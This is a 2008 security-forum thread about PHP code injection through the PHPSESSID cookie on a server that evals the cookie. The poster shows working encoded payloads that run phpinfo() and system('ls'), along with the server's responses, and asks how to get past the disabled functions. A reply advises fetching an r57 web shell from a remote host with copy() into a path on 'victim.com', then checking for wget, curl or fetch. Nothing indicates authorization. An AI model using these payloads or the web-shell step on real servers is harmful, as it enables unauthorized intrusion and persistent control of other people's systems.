 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 183
 Members: 0
 Total: 183
|
|
|
|
|
|
Full disclosure |
|
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
I need a little help |
|
 Posted: Thu May 01, 2008 4:32 am |
 |
|
| julioisaias |
| Valuable expert |
 |
|
| Joined: Jan 25, 2008 |
| Posts: 50 |
|
|
|
 |
|
 |
|
I need help for this problem.
PHP Execution in cookie
----------------------------
1. Original Cookie:
PHPSESSID=e2123291ddada51f7702819e2604e38b
Result: Normal Page......OK 
2. Malicious command in Cookie:
PHPSESSID='%3Bphpinfo%28%29%3Bexit%3B// <--- ';phpinfo();exit;// (encoded)
Result: PHP CONFIGURATION PAGE......OK
3. Other malicious command in cookie:
PHPSESSID='%3Bsystem%28%27ls%27%29%3Bexit%3B// <--- ';system("ls");exit;// (encoded)
Result: Warning: system() has been disabled for security reasons in /home/web/www/config/config.php(241) : eval()'d code on line 1 
Some another way?
Best Regards. |
|
_________________
I study enough to make the rest a result. |
|
|
|
| Posted: Thu May 01, 2008 5:03 am |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
Look in phpinfo.
Safe Mode is ON?
mod_security is installed?
disabled functions? |
|
|
|
|
| Posted: Thu May 01, 2008 5:39 am |
|
|
| julioisaias |
| Valuable expert |
|
|
| Joined: Jan 25, 2008 |
| Posts: 50 |
|
|
|
|
|
|
|
Thanks Koko.
safe_mode = Off
register_globals=Off
allow_url_fopen=On
allow_url_include=On
Disable functions= dl, exec, passthru, popen, proc_open, proc_close, shell_exec, system, posix_getgrgid, posix_getgrnam, posix_getpwname, posix_getpwuid, posix_kill, syslog,
file_uploads=On
magic_quotes_gpc=Off
magic_quotes_runtime=Off
magic_quotes_sybase=Off
Is it a possible SQL Injection?
Best Regards. |
|
_________________
I study enough to make the rest a result. |
|
|
|
| Posted: Thu May 01, 2008 8:14 am |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
If you have r57 web shell upload in some where.Next
@copy('http://yoursite.com/r57.txt','/full/path/to/victim.com/shell.php');
In r57 use eval() function to read files. |
|
|
|
|
| Posted: Thu May 01, 2008 9:10 am |
|
|
| julioisaias |
| Valuable expert |
|
|
| Joined: Jan 25, 2008 |
| Posts: 50 |
|
|
|
|
|
|
|
Thank you for your help, but I believe that I had bad luck.
Warning: copy(/home/web/www/shell.php) [function.copy]: failed to open stream: Permission denied in /home/web/www/config/config.php(241) : eval()'d code on line 1
Permission denied.... 
Can it be possible?
Best Regards. |
|
_________________
I study enough to make the rest a result. |
|
|
|
| Posted: Thu May 01, 2008 9:47 am |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
OK.
run command which wget curl fetch |
|
|
|
|
www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
